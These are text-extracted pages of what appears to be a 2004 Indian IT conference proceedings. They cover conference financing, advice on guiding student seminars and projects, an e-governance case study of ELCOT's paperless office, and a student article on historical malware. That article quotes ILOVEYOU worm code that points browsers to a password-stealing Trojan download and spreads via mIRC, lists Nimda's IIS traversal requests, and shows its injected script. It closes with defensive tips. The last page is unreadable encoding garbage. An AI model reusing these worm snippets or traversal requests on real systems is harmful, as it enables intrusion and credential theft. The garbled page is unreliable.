The conference also had a unique financingmodel Its registration fee was kept sufficientlylow to attract large number of participants Thusthe registration fees alone were not sufficient tomeet all the expenses Though the conference isorganized by an association in reality a localengineering college takes the lead every year inhosting it while other colleges provide financialsupport So a large part of the financialrequirement was met by the contribution fromthe local engineering colleges In return thesecolleges were given free registration for certainnumber of participants in the conference andthe tutorials

Tutorials were designed in such a way(content duration course materials and otherfacilities wise) that participants would not mindpaying to attend them Independentsponsorships were sought from local collegesfor special events and this was acknowledgedduring the event Besides association membersstaying abroad were able to garner a large chunkof financial support from some corporates Govtorganization like CSIR also extended somesupport The conference was able to generate asmall surplus besides meeting all its needs Thissurplus is given to the parent association to carryout computer awareness activitiesConclusion

The whole experience of being part of theorganizing team that carried out planningdesigning and organizing of the conferenceshowed that by bringing in innovation todifferent dimensions of the conference a teamcan not only enhance both the quality andquantity of participation among variousstakeholders it can turn the whole experienceinto an enriching and fun filled experience

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

for undergraduate engineering students in theirfinal year is an important and statutory part ofany university curriculum Seminar measuresmostly the external abilities and projectmeasures the internal abilities of a studentThrough seminar besides the technicalknowledge the presentation communicationand interpersonal skills of a student also getreflected Through project the depth of technicalknowledge acquired amp degree of understandingon fundamentals of engineering subjects by thestudent get evaluated Also to some extent thepresentation skills of a student gets reflect whenhe or she submits the project report and presentsbefore the audience (examiners studentcolleagues etc) A student goes through varietiesof engineering subjects (both theory andsessional) during his or her engineering studtyThese papers are mainly divided into twocategories (i) Core papers amp (ii) Supportingpapers Seminars and projects are based on thethorough understanding of all these papers bythe students Besides these course curriculumknowledge the projects amp seminars are alsobased on the extra or additional knowledgeacquired by the students by going throughvarious journals magazines research papersCDs internet amp reference books etc and byattending several tutorials workshopsseminars conferences symposiums andtechnical competitions etc

In short seminar and project are one typeof indicators of a students mental capability and

orientation to face and accept the practical andtechnical challenges in the real scenarios infuture

Role of faculty members as guides aco-guides

A student needs active support from his orher guide or co-guide for preparing himself orherself to present seminar and carrying out aproject work successfully Normally this guideis one of the faculty members of the concerneddepartment But some cases when a studentcarries out a project work in an organizationother than his or her institute a member of thatorganization becomes the guide However inthat case one of the faculty members of thedepartment must become a co-guide The role orthe co-guide is very important in the sense thathe or she has to orient the project done by thestudents as per the University guidelines Aseminar can be presented individually or ingroup (normally no of group members shouldnot exceed 3) Each Seminar team (either onemember or multiple members) must be linkedwith a guide called seminar guide Similarly aproject can be done individually or in group(normally no of group members should notexceed 5) Each project team (either one memberor multiple members) must be linked with a guideor co-guide called project guide or project co-guide Selecting a guide by a student group orvice versa is normally done through mutualconsultation Head of the department can playthe role of a negotiator in this situation For abetter focus and attention no of project teamsunder the supervision of a project guide or co-

OITS-2004

30

guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

